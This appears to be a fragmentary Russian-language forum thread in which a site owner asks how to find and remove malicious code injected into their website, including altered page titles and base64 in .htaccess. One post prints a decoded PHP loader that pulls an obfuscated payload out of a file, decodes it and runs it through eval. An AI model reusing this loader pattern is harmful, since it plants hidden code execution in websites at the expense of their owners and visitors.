NewsFROM

я как раз этой штукой уже нашел. и что дальше? тотал ком. не ищет

и где искать?

что то ничего не находится.

да заметил ещё 1 странную вещь.

Описание страниц- тайттлы, отображаются измененнными только на некоторых страницах. т.е. не у всех.

---------- Добавлено 17.12.2012 в 11:23 ----------

как опредлелить начало и окончание зловредной вставки в код? так можно удалить нужные части кода и тогда сайт не будет работать.

Есть тут тема, оч похожая на мою проблему. /ru/forum/711151 оч странно , что очень мог народу это поддерживает и пользуется не законными услугами. мой статус не позволяет задать вопрос этому ТС.....

не могу сюда выложить весь код .пишет слишклм длинный... хостер пишет ищите вирусы:))) приколисты:))) как понять вирус в коде или нет и как он может выглядеть.

Проверил кракозябры через декодер. Выдает такое:

$_000O=Array();for ($_0OOO=97;$_0OOO<123;$_0OOO++) $_000O[]=chr($_0OOO);for ($_0OOO=65;$_0OOO<91;$_0OOO++) $_000O[]=chr($_0OOO);$_0000=implode("",$_000O);$_OO0=fopen($_0OO,"rb");fseek($_OO0,$_O0O,SEEK_SET);$_000=fread($_OO0,$_OOO);fclose($_OO0);$_00OO="/*LPR".str_pad($_O0O,6,STR_PAD_LEFT,"0");$_0O0=strpos($_000,$_00OO);$_00O=substr($_000,$_0O0+11,52);$_000=substr($_000,$_0O0+63,strpos($_000,"*/",$_0O0+63)-$_0O0-63);$_000=base64_decode(strtr($_000,$_0000,$_00O));eval($_000);

Что с этим делать ?

соглашусь, что у меня уровень не академический в таких делах:))) но не все это и дано.

---------- Добавлено 08.12.2012 в 14:57 ----------

простите, в какой декодер? и где взять.

доктор вебом ничего не находит. и сервис гугла и сервис яндекса тоже не находит ничегошеньки

модератор одобрил показать что в .htaccess (см. выше.) есть там base64, но что с эти делать?? по истрии изменения файлов на хостинге это март месяц этого года и такого не было..

---------- Добавлено 07.12.2012 в 19:13 ----------

где искать этот .js ???

файл коротенький. дата изменения в марте месяце эотго года. слышал , что вирусы могут менять даты.но не на хостинге же? скинул сюда но почемуто неотобразилось . модератор должен проверить.... что там смотреть .особо нет ничего, кроме правил, насколько я понял.